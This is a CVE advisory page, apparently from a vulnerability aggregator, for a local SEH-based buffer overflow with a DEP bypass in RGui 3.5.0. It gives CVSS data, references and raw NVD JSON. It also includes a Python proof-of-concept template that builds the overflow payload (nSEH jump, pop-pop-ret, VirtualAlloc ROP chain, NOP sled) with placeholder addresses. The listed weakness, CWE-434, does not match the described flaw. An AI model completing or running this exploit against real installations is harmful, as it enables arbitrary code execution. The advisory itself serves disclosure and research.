CVE-2018-25258

Description

RGui 3.5.0 contains a local buffer overflow vulnerability in the GUI preferences dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can craft malicious input in the Language for menus and messages field to trigger a stack-based buffer overflow, execute a ROP chain for VirtualAlloc allocation, and achieve arbitrary code execution.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

RGui 3.5.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# This is a conceptual PoC for the buffer overflow in RGui 3.5.0
# It generates the malicious payload to trigger the SEH overwrite and DEP bypass.

import struct

# Bad characters (example)
bad_chars = b"\x00\x0a\x0d"

# Offset to SEH handler (needs to be calculated via debugging)
offset_seh = 524

# POP POP RET address from a non-ASLR module (Example placeholder)
# In a real scenario, find a reliable address from RGui's loaded DLLs (e.g., MSVCRT.dll)
pop_pop_ret = struct.pack("<I", 0xAAAAAAAA) 

# ROP Chain to call VirtualAlloc
# This is a simplified representation
rop_chain = b""
rop_chain += struct.pack("<I", 0xBBBBBBBB) # Pivot
rop_chain += struct.pack("<I", 0xCCCCCCCC) # VirtualAlloc
# ... arguments for VirtualAlloc (lpAddress, dwSize, flAllocationType, flProtect)

# Shellcode (Calc.exe example)
shellcode = b"\x90" * 16
# shellcode += b"\x31\xc0..." (Real shellcode here)

# Padding to align
nseh = b"\xeb\x06\x90\x90" # jmp short 6

# Construct the payload
payload = b"A" * offset_seh
payload += nseh
payload += pop_pop_ret
payload += rop_chain
payload += b"\x90" * 32
payload += shellcode
payload += b"C" * (1000 - len(payload)) # Fill rest of buffer

print(f"Payload Length: {len(payload)}")
# This payload should be set in the 'Language for menus and messages' registry key or input field.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25258
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25258
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25258/
[4] VulDB https://vuldb.com/cve/CVE-2018-25258
[5] https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe
[6] https://www.exploit-db.com/exploits/46107
[7] https://www.r-project.org/
[8] https://www.vulncheck.com/advisories/rgui-local-buffer-overflow-seh-dep-bypass

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25258", "sourceIdentifier": "[email protected]", "published": "2026-04-12T13:16:31.740", "lastModified": "2026-04-15T15:00:32.790", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "RGui 3.5.0 contains a local buffer overflow vulnerability in the GUI preferences dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can craft malicious input in the Language for menus and messages field to trigger a stack-based buffer overflow, execute a ROP chain for VirtualAlloc allocation, and achieve arbitrary code execution."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46107", "source": "[email protected]"}, {"url": "https://www.r-project.org/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/rgui-local-buffer-overflow-seh-dep-bypass", "source": "[email protected]"}]}}